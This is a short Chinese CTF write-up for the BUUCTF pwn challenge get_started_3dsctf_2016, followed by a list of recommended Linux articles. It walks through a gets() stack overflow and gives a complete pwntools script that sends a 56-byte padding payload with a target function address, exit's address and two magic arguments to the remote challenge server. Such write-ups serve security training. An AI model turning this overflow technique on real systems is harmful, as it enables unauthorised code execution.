get_started_3dsctf_2016

checksec

没有栈保护,应该还是栈溢出

一般是先在main函数查找,看看整体逻辑

找到了get漏洞

注意啊注意!

这里这道题没有缓冲区

这是正常的题,这里有个s

但是这道题!

只有R没有s

这里有一个点,在函数构建的时候,我们返回函数这里是addr,在引用这个函数时,我们要马上接入他的返回函数,这里就是exit,然后再传参,之前的题没有这个因为没有正常结束不会有什么问题

python 复制代码
from pwn import *
ghust = remote("node5.buuoj.cn",26779)
addr= 0x80489A0
exit_addr=0x0804E6A0
a1=814536271
a2=425138641
payload = b'a'*56 +p32(addr)+p32(exit_addr)+p32(a1)+p32(a2)
ghust.sendline(payload)
ghust.interactive()
相关推荐
阿杆16 分钟前
😡同事查日志太慢,我现场教他一套 grep 组合拳!
linux·后端
墨小傲27 分钟前
基于Linux下的vscode c/c++开发环境搭建详细教程
linux·c语言·vscode
cui_win34 分钟前
【网络】Linux 内核优化实战 - net.ipv4.tcp_timestamps
linux·网络·tcp/ip
czhc114007566335 分钟前
Linux 77 FTP
linux·运维·服务器
魂尾ac44 分钟前
Centos Docker 安装(100%成功)
linux·docker·centos
天若有情6731 小时前
【Linux】02_CentOS 7 开机运行级别详解:从基础概念到实战配置
linux·运维·centos
ajassi20001 小时前
开源 C# .net mvc 开发(八)IIS Express轻量化Web服务器的配置和使用
linux·开源·c#·mvc·.net
張萠飛1 小时前
Linux中程序的limits中的Max open files的配置由哪些参数决定
linux·运维·服务器
KoiHeng4 小时前
操作系统简要知识
linux·笔记
Johny_Zhao7 小时前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维